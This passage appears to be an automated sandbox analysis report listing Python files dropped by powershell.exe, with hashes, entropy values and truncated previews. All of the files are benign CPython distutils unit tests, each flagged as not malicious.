                                                                                                                                                                                                            Entropy (8bit):4.600339899693445
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:BMfk1rArlxgnMAYJ8H9NYL7Mki9zI7g5XH+aFI:Ofk1rArl+MAYd0kOk7g5OaFI
                                                                                                                                                                                                            MD5:F83180C77C3CA1BD7CD908C0644B198A
                                                                                                                                                                                                            SHA1:F44DC9090F48D468ED6AEDF9B41534481B00E2F5
                                                                                                                                                                                                            SHA-256:9C0B38D07DF20F670EA7B4663C74AD5E5B3E81A1E152B51C0AD474AEE95CF146
                                                                                                                                                                                                            SHA-512:84EB9DC6730438AAC89F6F256DE95D186519278E2C4F41CB99FF3BED10E71E839AD9393F910256A2B151E45E1561701D5A24E94E9F9792879CE460A80463FF47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.bdist_msi."""..import sys..import unittest..from test.support import run_unittest..from test.support.warnings_helper import check_warnings..from distutils.tests import support......@unittest.skipUnless(sys.platform == 'win32', 'these tests require Windows')..class BDistMSITestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def test_minimal(self):.. # minimal test XXX need more tests.. from distutils.command.bdist_msi import bdist_msi.. project_dir, dist = self.create_dist().. with check_warnings(("", DeprecationWarning)):.. cmd = bdist_msi(dist).. cmd.ensure_finalized()......def test_suite():.. return unittest.makeSuite(BDistMSITestCase)....if __name__ == '__main__':.. run_unittest(test_suite())..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5147
                                                                                                                                                                                                            Entropy (8bit):4.720271218968658
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:kxrlVzSXgfIHDlFf5t2kQU5bB5tzymkQU6bl5T+/:kZbIHD36kQU5bBymkQU6brT+/
                                                                                                                                                                                                            MD5:8109B0AF67110DCB8EB860BB8D472B50
                                                                                                                                                                                                            SHA1:287C71047C0BBF511C0D3F19C4B46D4321A5CC9F
                                                                                                                                                                                                            SHA-256:466F440C7AEDE82F8D53D469951747DFB14BF3ED829F53B821C4740C4D095AE2
                                                                                                                                                                                                            SHA-512:6DA5C722C7119100C4065124351ABFFD22234DD229BC0929926667EEBE1F971D781DE6B7AE02AFBC5CC626551F889989007B4C6199B220A65778FF456317BB40
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.bdist_rpm."""....import unittest..import sys..import os..from test.support import run_unittest, requires_zlib....from distutils.core import Distribution..from distutils.command.bdist_rpm import bdist_rpm..from distutils.tests import support..from distutils.spawn import find_executable....SETUP_PY = """\..from distutils.core import setup..import foo....setup(name='foo', version='0.1', py_modules=['foo'],.. url='xxx', author='xxx', author_email='xxx')...."""....class BuildRpmTestCase(support.TempdirManager,.. support.EnvironGuard,.. support.LoggingSilencer,.. unittest.TestCase):.... def setUp(self):.. try:.. sys.executable.encode("UTF-8").. except UnicodeEncodeError:.. raise unittest.SkipTest("sys.executable is not encodable to UTF-8").... super(BuildRpmTestCase, self).setUp().. self.old_location = os.getcwd().. self.old_sys_arg
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2021
                                                                                                                                                                                                            Entropy (8bit):4.682315372116889
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OWFrLMCFMAUHUOKoUjHx9NZqFgxkAJaF/uSa5/2I:TFrLdFSHf6HxRquuAItuSa5/Z
                                                                                                                                                                                                            MD5:459D5D0B703C0D3AE1A4324F616367DD
                                                                                                                                                                                                            SHA1:0A2BD6855B2CB28497DBC2733BA50D5335B3BE7D
                                                                                                                                                                                                            SHA-256:AEA15639049FE273348D4C7E147535BC6A84AC8B30A1A39EE19ABFE5669A89D7
                                                                                                                                                                                                            SHA-512:F0023698A0CD36297E1BFD92F6FBC60389F1C63EEDE55E2947C53C43A7D7F32828DB69596FC0774B27DF255C281A2257D6705A3628446E0F2AE7A8DFE826F354
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.build."""..import unittest..import os..import sys..from test.support import run_unittest....from distutils.command.build import build..from distutils.tests import support..from sysconfig import get_platform....class BuildTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def test_finalize_options(self):.. pkg_dir, dist = self.create_dist().. cmd = build(dist).. cmd.finalize_options().... # if not specified, plat_name gets the current platform.. self.assertEqual(cmd.plat_name, get_platform()).... # build_purelib is build + lib.. wanted = os.path.join(cmd.build_base, 'lib').. self.assertEqual(cmd.build_purelib, wanted).... # build_platlib is 'build/lib.platform-x.x[-pydebug]'.. # examples:.. # build/lib.macosx-10.3-i386-2.7.. plat_spec = '.%s-%d.%d' % (cmd.plat_name, *sys.version_info[:2])..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5057
                                                                                                                                                                                                            Entropy (8bit):4.637316414599353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:408Vr0BYSyDeNUbnKbWb9tbFefAbPeFQbLWAbLAJNx9Gb75wjbJGnORnKqB5vZ:40yvdneq99Fefw5Vb75CJNrXvZ
                                                                                                                                                                                                            MD5:87A4C106869C5961D769AEA00C2DF0A9
                                                                                                                                                                                                            SHA1:B069F097EC0BB94AE995E4294C200833E98D285C
                                                                                                                                                                                                            SHA-256:69077611D380751F0F9F2D93CF1F09AC4BCE16F8109238342FC92EBE5832BA11
                                                                                                                                                                                                            SHA-512:6D0CFE3E1946742CF661B20B08BA2D2C0C965E6C230A1B5C584C2959EEB12B0541F988AB3ED7D6BA245A4AB076A83939CCE533D5EBB736958662EDFC175A6939
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.build_clib."""..import unittest..import os..import sys..import sysconfig....from test.support import run_unittest, missing_compiler_executable....from distutils.command.build_clib import build_clib..from distutils.errors import DistutilsSetupError..from distutils.tests import support....class BuildCLibTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def setUp(self):.. super().setUp().. self._backup_CONFIG_VARS = dict(sysconfig._CONFIG_VARS).... def tearDown(self):.. super().tearDown().. sysconfig._CONFIG_VARS.clear().. sysconfig._CONFIG_VARS.update(self._backup_CONFIG_VARS).... def test_check_library_dist(self):.. pkg_dir, dist = self.create_dist().. cmd = build_clib(dist).... # 'libraries' option must be a list.. self.assertRaises(DistutilsSetupError, cmd.check_library_list, 'foo').... # each el
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21382
                                                                                                                                                                                                            Entropy (8bit):4.647137403495379
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:k60Bh1Bvrn97PA2b48hHOn5oOabY0r2FmGxsT88fWcM9:k60B3Bjn97PA23MJU12sGxEG
                                                                                                                                                                                                            MD5:07738A7BFAD538CD009C9F1792A41589
                                                                                                                                                                                                            SHA1:03783889AFB060215D23EAE9394830F9BC262BA2
                                                                                                                                                                                                            SHA-256:F8CE59DCD987CF52311AF197E0AF816800A77D7945E1BCE7DD9B2221F40A4035
                                                                                                                                                                                                            SHA-512:D2530455F9E202CF9A9B1635C08C8CF47D1B92853B8A58D5D9E20181EDE7904BB5CB9A5A6FF326E2DCFA3097CCDA2CA239856A2B1D6487B7CE35A5BAB8E95022
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys..import os..from io import StringIO..import textwrap....from distutils.core import Distribution..from distutils.command.build_ext import build_ext..from distutils import sysconfig..from distutils.tests.support import (TempdirManager, LoggingSilencer,.. copy_xxmodule_c, fixup_build_ext)..from distutils.extension import Extension..from distutils.errors import (.. CompileError, DistutilsPlatformError, DistutilsSetupError,.. UnknownFileError)....import unittest..from test import support..from test.support import os_helper..from test.support.script_helper import assert_python_ok....# http://bugs.python.org/issue4373..# Don't load the xx module more than once...ALREADY_TESTED = False......class BuildExtTestCase(TempdirManager,.. LoggingSilencer,.. unittest.TestCase):.. def setUp(self):.. # Create a simple test environment.. super(BuildExtTestCase, self).setUp().. self.tmp_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6514
                                                                                                                                                                                                            Entropy (8bit):4.603184903569587
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:0SdV7SrH0SRObMACrBRnOy0+NlhrYlhlhnQcRE0+CuU/T/5MZ:0fH0Gjn50+NH0H9q0+Cl/9MZ
                                                                                                                                                                                                            MD5:675CF27B48BD3AC3ACB37A31229EF21A
                                                                                                                                                                                                            SHA1:C79CC2B3C7165AA6223E8D28F79723832795B67D
                                                                                                                                                                                                            SHA-256:65ABF42146797B2B19538F4AF9986A9033B887F08DACDA15C1655280D5940640
                                                                                                                                                                                                            SHA-512:25D0AABB1CFBF81A5851561EDDDF7BF670C0F960FC60EA8F4177B907CA9883C11165FF3D1B3CE1DF4642B29AC9F1FFF10D541ED6F21A38096B1173751B73BDFF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.build_py."""....import os..import sys..import unittest....from distutils.command.build_py import build_py..from distutils.core import Distribution..from distutils.errors import DistutilsFileError....from distutils.tests import support..from test.support import run_unittest......class BuildPyTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def test_package_data(self):.. sources = self.mkdtemp().. f = open(os.path.join(sources, "__init__.py"), "w").. try:.. f.write("# Pretend this is a package.").. finally:.. f.close().. f = open(os.path.join(sources, "README.txt"), "w").. try:.. f.write("Info about this package").. finally:.. f.close().... destination = self.mkdtemp().... dist = Distribution({"packages": ["pkg"],.. "package_dir": {"pkg": sourc
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3705
                                                                                                                                                                                                            Entropy (8bit):4.360057375797557
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1NV/8VSrCrncIFio5N5q5sGEkyW0hdU5PZ:5P4Jio74aGzyuPZ
                                                                                                                                                                                                            MD5:59A6DAECB468B4C4F8AF4BB8DC6CDD8D
                                                                                                                                                                                                            SHA1:832F05018C8ECF828760B182B790BEEB6A13A610
                                                                                                                                                                                                            SHA-256:514F5BF038CF256C4D0778E6E954B961C3D429B593F5C8F5340BE24D64AE8388
                                                                                                                                                                                                            SHA-512:1320DFA68DA2D4A343015D20C0291749FB5CE8ECEE5D8A7932842DAAB9F34B91385E459DCE92EB15D0CAD9DC5A265B6352616F91A7321FC62E7689F4F6AFDB71
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.build_scripts."""....import os..import unittest....from distutils.command.build_scripts import build_scripts..from distutils.core import Distribution..from distutils import sysconfig....from distutils.tests import support..from test.support import run_unittest......class BuildScriptsTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def test_default_settings(self):.. cmd = self.get_build_scripts_cmd("/foo/bar", []).. self.assertFalse(cmd.force).. self.assertIsNone(cmd.build_dir).... cmd.finalize_options().... self.assertTrue(cmd.force).. self.assertEqual(cmd.build_dir, "/foo/bar").... def test_build(self):.. source = self.mkdtemp().. target = self.mkdtemp().. expected = self.write_sample_scripts(source).... cmd = self.get_build_scripts_cmd(target,.. [os.pa
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5874
                                                                                                                                                                                                            Entropy (8bit):4.516656929323832
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:3rL9SYNmpi/NCLyseOkgRBE9BOOtCs16PpYEu1OkgRBAQtJZApR6DLzXOkKqu5XZ:76LyMkgRBkYY69kgRBXApRe2koXZ
                                                                                                                                                                                                            MD5:1CBCED7D94176CE46AFFC2FD03CD1370
                                                                                                                                                                                                            SHA1:61D6262E2D2AD2E7F8428D4BF814EA302095F71B
                                                                                                                                                                                                            SHA-256:8D6746AD4ED097A0028F5AB10E6BCB5CC7F061721496BD6CA721B398AB383E9D
                                                                                                                                                                                                            SHA-512:F164FA3D48D64FF6D892216CC16060C6536B1D8BE0A6445A11D9424DF32E5CAEF6BD53C2DCFF47C66D0B58C59171EE954D6E19084F00AF002A0DDB9E7DE92AE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.check."""..import os..import textwrap..import unittest..from test.support import run_unittest....from distutils.command.check import check, HAS_DOCUTILS..from distutils.tests import support..from distutils.errors import DistutilsSetupError....try:.. import pygments..except ImportError:.. pygments = None......HERE = os.path.dirname(__file__)......class CheckTestCase(support.LoggingSilencer,.. support.TempdirManager,.. unittest.TestCase):.... def _run(self, metadata=None, cwd=None, **options):.. if metadata is None:.. metadata = {}.. if cwd is not None:.. old_dir = os.getcwd().. os.chdir(cwd).. pkg_info, dist = self.create_dist(**metadata).. cmd = check(dist).. cmd.initialize_options().. for name, value in options.items():.. setattr(cmd, name, value).. cmd.ensure_finalized().. cmd.run().. if cwd is not Non
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1490
                                                                                                                                                                                                            Entropy (8bit):4.321766370325489
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:BMNnMcnMAUrUJ3nhvi9geotV4IFIQmDhtZosTxNI79XhX2LtxNI79Q5XtgpYI:ONMcMAUrwOgeonMVtZVC7zXoC725m2I
                                                                                                                                                                                                            MD5:2BC5402E4D16F3AB5AD007DDB4A0D047
                                                                                                                                                                                                            SHA1:0310A05BB5ADC900C33C80C544161631E255A01D
                                                                                                                                                                                                            SHA-256:DD5755A4AB9DABE80423E8990BAFA0BBD9DD24358D16E736A3D23EB3C8848802
                                                                                                                                                                                                            SHA-512:B0AD4E2ADFCAE05A325BF8BFAE6F53B1160CB5EC29D58740EE301EC0A50075C917C278B29EB56C68B26CA20EAC4D64445B18A34241CCB5171A9625BF84C4C5C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.clean."""..import os..import unittest....from distutils.command.clean import clean..from distutils.tests import support..from test.support import run_unittest....class cleanTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def test_simple_run(self):.. pkg_dir, dist = self.create_dist().. cmd = clean(dist).... # let's add some elements clean should remove.. dirs = [(d, os.path.join(pkg_dir, d)).. for d in ('build_temp', 'build_lib', 'bdist_base',.. 'build_scripts', 'build_base')].... for name, path in dirs:.. os.mkdir(path).. setattr(cmd, name, path).. if name == 'build_base':.. continue.. for f in ('one', 'two', 'three'):.. self.write_file(os.path.join(path, f)).... # let's run the command.. cmd.all = 1.. cmd.ensure_finali
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3961
                                                                                                                                                                                                            Entropy (8bit):4.51631341768119
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:drdpFKdpUvQKza5wAY/JiMZ52dfp/Nz5W/:9rRvvzQwAY/J9cdfp/NVW/
                                                                                                                                                                                                            MD5:3E644D8958B0EA4025DAD204DF6A0010
                                                                                                                                                                                                            SHA1:09780802B26412840AA3D8C17AF166BBC6FD614F
                                                                                                                                                                                                            SHA-256:F166B78E6F6A04B83C581D87C3A12AD1E19B276F124CB70DE848CD76CAA6D48F
                                                                                                                                                                                                            SHA-512:9B8695A932EC9D8AE796C70C528584D3FB5F50AC8E5AA9834C0BB5D5C7F52666EAC99736DE32CBC547DFFEEFF9B87F5192CCBB49E5E3E1E4952B5313C5FC5B5B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.cmd."""..import unittest..import os..from test.support import captured_stdout, run_unittest....from distutils.cmd import Command..from distutils.dist import Distribution..from distutils.errors import DistutilsOptionError..from distutils import debug....class MyCmd(Command):.. def initialize_options(self):.. pass....class CommandTestCase(unittest.TestCase):.... def setUp(self):.. dist = Distribution().. self.cmd = MyCmd(dist).... def test_ensure_string_list(self):.... cmd = self.cmd.. cmd.not_string_list = ['one', 2, 'three'].. cmd.yes_string_list = ['one', 'two', 'three'].. cmd.not_string_list2 = object().. cmd.yes_string_list2 = 'ok'.. cmd.ensure_string_list('yes_string_list').. cmd.ensure_string_list('yes_string_list2').... self.assertRaises(DistutilsOptionError,.. cmd.ensure_string_list, 'not_string_list').... self.assertRaises(DistutilsOptionE
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4033
                                                                                                                                                                                                            Entropy (8bit):4.7608997204341765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q1FVkFVSrkA/DmGghmg9uKhWvgWvKjpvG5zZ:uoYp/DmGu8GIzZ
                                                                                                                                                                                                            MD5:F24F9C5EACFD28463C5980D38A7FD139
                                                                                                                                                                                                            SHA1:13B00E7E3E2FE6F7073B419ECC6F643B09A48E09
                                                                                                                                                                                                            SHA-256:5390ED0D0C2B09E848A4639EDE8D42CC0DF630370D6B163C8F423EB2C199C734
                                                                                                                                                                                                            SHA-512:3854373EC52A5297E8497EBFA84881F22787726334686CBA579F147D2F0B5BFD187B270C56F3FAA628FEF19B1B6F1BCB7F37DB051EDB16B52DBA1B662436B099
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.pypirc.pypirc."""..import os..import unittest....from distutils.core import PyPIRCCommand..from distutils.core import Distribution..from distutils.log import set_threshold..from distutils.log import WARN....from distutils.tests import support..from test.support import run_unittest....PYPIRC = """\..[distutils]....index-servers =.. server1.. server2.. server3....[server1]..username:me..password:secret....[server2]..username:meagain..password: secret..realm:acme..repository:http://another.pypi/....[server3]..username:cbiggles..password:yh^%#rest-of-my-password.."""....PYPIRC_OLD = """\..[server-login]..username:tarek..password:secret.."""....WANTED = """\..[distutils]..index-servers =.. pypi....[pypi]..username:tarek..password:xxx.."""......class BasePyPIRCCommandTestCase(support.TempdirManager,.. support.LoggingSilencer,.. support.EnvironGuard,.. unittest.TestCase):....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3299
                                                                                                                                                                                                            Entropy (8bit):4.664908356352447
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:L08Wr0oS3TrWDsNopBwQ7qMZdCPYExK5hZ:L07YTin7RWMCwExihZ
                                                                                                                                                                                                            MD5:553D6D6E3B929BD65B51E049E3619630
                                                                                                                                                                                                            SHA1:E8D0D4017622FB53286266A37F18E12F11763C7C
                                                                                                                                                                                                            SHA-256:BFD56918F4BB8F15CB1D465028DDE5EC45046B2FA2DD916774EC799A1087F0CF
                                                                                                                                                                                                            SHA-512:80880BE7E0CE5CBC27FDF9D6CF5253DCB11739C88D3C7ACE24F2058FAFE7AEA9A2E947B8C31FEBC07D7C6BE8BA594F5BE27FE4398D4FCD32103F2261572C5CF7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.config."""..import unittest..import os..import sys..import sysconfig..from test.support import run_unittest, missing_compiler_executable....from distutils.command.config import dump_file, config..from distutils.tests import support..from distutils import log....class ConfigTestCase(support.LoggingSilencer,.. support.TempdirManager,.. unittest.TestCase):.... def _info(self, msg, *args):.. for line in msg.splitlines():.. self._logs.append(line).... def setUp(self):.. super(ConfigTestCase, self).setUp().. self._logs = [].. self.old_log = log.info.. log.info = self._info.. self.old_config_vars = dict(sysconfig._CONFIG_VARS).... def tearDown(self):.. log.info = self.old_log.. sysconfig._CONFIG_VARS.clear().. sysconfig._CONFIG_VARS.update(self.old_config_vars).. super(ConfigTestCase, self).tearDown().... def test_dump_file(self):.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4220
                                                                                                                                                                                                            Entropy (8bit):4.595032508714701
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:HFrerxSHExMGH6KYoQfBcnGjkDzq2jHJVky5AOhsT8/NeVGl7A5wZ:Hl0LUNoDzq2rzhAmsT8/Newl7kwZ
                                                                                                                                                                                                            MD5:79BF4E9036B089B12DCC760BE38CF696
                                                                                                                                                                                                            SHA1:238DDCE10823F0AF473C7B674C5F105D794D51F7
                                                                                                                                                                                                            SHA-256:2BC6B5587C82FB7254351BBCC0598E618C56DD81AA7D1C880AD771885F0D24A0
                                                                                                                                                                                                            SHA-512:9D6419FCAEE2DA3A496C3423789D4F2CAED2D06C3DF119CB97D33B50AE0001A7D6E17695D641763202442C7F634E8435F72A6444CA33FB754D886A914F28DBA4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.core."""....import io..import distutils.core..import os..import shutil..import sys..from test.support import captured_stdout, run_unittest..from test.support import os_helper..import unittest..from distutils.tests import support..from distutils import log....# setup script that uses __file__..setup_using___file__ = """\....__file__....from distutils.core import setup..setup().."""....setup_prints_cwd = """\....import os..print(os.getcwd())....from distutils.core import setup..setup().."""....setup_does_nothing = """\..from distutils.core import setup..setup().."""......setup_defines_subclass = """\..from distutils.core import setup..from distutils.command.install import install as _install....class install(_install):.. sub_commands = _install.sub_commands + ['cmd']....setup(cmdclass={'install': install}).."""....class CoreTestCase(support.EnvironGuard, unittest.TestCase):.... def setUp(self):.. super(CoreTestCase, self).setUp().. self.old_stdo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5790
                                                                                                                                                                                                            Entropy (8bit):4.87774500396435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:NxOrLLTf5Q8HTL3n48q3fltLsCTGTigRGTVw6OT4001rzo39hZncYN54/:NCuU3n4xfltLsCKlRG66OK+4/
                                                                                                                                                                                                            MD5:0A88EA408D0A5567764AE5D867A4F996
                                                                                                                                                                                                            SHA1:4F03046AC3747D1FB27D7FB99B1CCC1B31BA9E56
                                                                                                                                                                                                            SHA-256:FBDD445D94BC57FA0C0A833A862841D6E4A709FA3925D8EFD6EEB1F259A287B2
                                                                                                                                                                                                            SHA-512:C8E48516BA8B313F0A01775CDEC93AAB4CE1818D1A366DA5BFB48E9473BB80B74954009BD1E8AC2EC8A3933445D64ED5E096DABF7B5E0DE54E38AD2C2AB169B9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.cygwinccompiler."""..import unittest..import sys..import os..from io import BytesIO..from test.support import run_unittest....from distutils import cygwinccompiler..from distutils.cygwinccompiler import (check_config_h,.. CONFIG_H_OK, CONFIG_H_NOTOK,.. CONFIG_H_UNCERTAIN, get_versions,.. get_msvcr)..from distutils.tests import support....class FakePopen(object):.. test_class = None.... def __init__(self, cmd, shell, stdout):.. self.cmd = cmd.split()[0].. exes = self.test_class._exes.. if self.cmd in exes:.. # issue #6438 in Python 3.x, Popen returns bytes.. self.stdout = BytesIO(exes[self.cmd]).. else:.. self.stdout = os.popen(cmd, 'r')......class CygwinCCompilerTestCase(support.TempdirManager,.. unittest.TestCase):.... def setUp(self):.. super(Cy
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2900
                                                                                                                                                                                                            Entropy (8bit):4.461416867189248
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OTMxZMNMAUrIAIdrCY9hQxECWCk1VtGMgUfLwAo/GUiCUZS/562I:YkZwSrurbiiCWCStH1Tdkihw/56Z
                                                                                                                                                                                                            MD5:7FBBB383DEAD4C7DB159E1CEE4C9A07B
                                                                                                                                                                                                            SHA1:AD6C53917390C24500C6219358E2B3115FBB0F74
                                                                                                                                                                                                            SHA-256:9118D62FDC02D02663AD267158A76FC87715DA3DB86CE7CE8631C20906858D0F
                                                                                                                                                                                                            SHA-512:BB0761B87E87A70BBB0D4B5FE910039BAF4AF30048333DA597554C12D8B5E4C92B2E01134B814BAE93FCC5D37E72081BCDA3917DA92CC2DC959FFB883354F9E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.dep_util."""..import unittest..import os....from distutils.dep_util import newer, newer_pairwise, newer_group..from distutils.errors import DistutilsFileError..from distutils.tests import support..from test.support import run_unittest....class DepUtilTestCase(support.TempdirManager, unittest.TestCase):.... def test_newer(self):.... tmpdir = self.mkdtemp().. new_file = os.path.join(tmpdir, 'new').. old_file = os.path.abspath(__file__).... # Raise DistutilsFileError if 'new_file' does not exist... self.assertRaises(DistutilsFileError, newer, new_file, old_file).... # Return true if 'new_file' exists and is more recently modified than.. # 'old_file', or if 'new_file' exists and 'old_file' doesn't... self.write_file(new_file).. self.assertTrue(newer(new_file, 'I_dont_exist')).. self.assertTrue(newer(new_file, old_file)).... # Return false if both exist and 'old_file' is the same age or yo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4793
                                                                                                                                                                                                            Entropy (8bit):4.6231908764483896
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:3cFAZfaSri/8188m7r8a/lqy/y1SZFmTNJGN50Z:3cYi/wQrQy/T0Z
                                                                                                                                                                                                            MD5:EEA28AB898BB949039BB0CFBFEE027D6
                                                                                                                                                                                                            SHA1:EC2ACCDF1408A63A61F21D421DBB3B7B3F2B69AB
                                                                                                                                                                                                            SHA-256:656E8884F840694A859D9BFF156781AF450BCC22489179B4E50790987E73B764
                                                                                                                                                                                                            SHA-512:BCFC545F74676E6D129BFE2ED66E4E3361D80C6A6E631393ABF7A6735047FFCC3B5D83FFE74CB1A8793E625F680791CA1531142153D1A755DC68FDEDFED55E8B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.dir_util."""..import unittest..import os..import stat..import sys..from unittest.mock import patch....from distutils import dir_util, errors..from distutils.dir_util import (mkpath, remove_tree, create_tree, copy_tree,.. ensure_relative)....from distutils import log..from distutils.tests import support..from test.support import run_unittest......class DirUtilTestCase(support.TempdirManager, unittest.TestCase):.... def _log(self, msg, *args):.. if len(args) > 0:.. self._logs.append(msg % args).. else:.. self._logs.append(msg).... def setUp(self):.. super(DirUtilTestCase, self).setUp().. self._logs = [].. tmp_dir = self.mkdtemp().. self.root_target = os.path.join(tmp_dir, 'deep').. self.target = os.path.join(self.root_target, 'here').. self.target2 = os.path.join(tmp_dir, 'deep2').. self.old_log = log.info.. log.info = self._log.... de
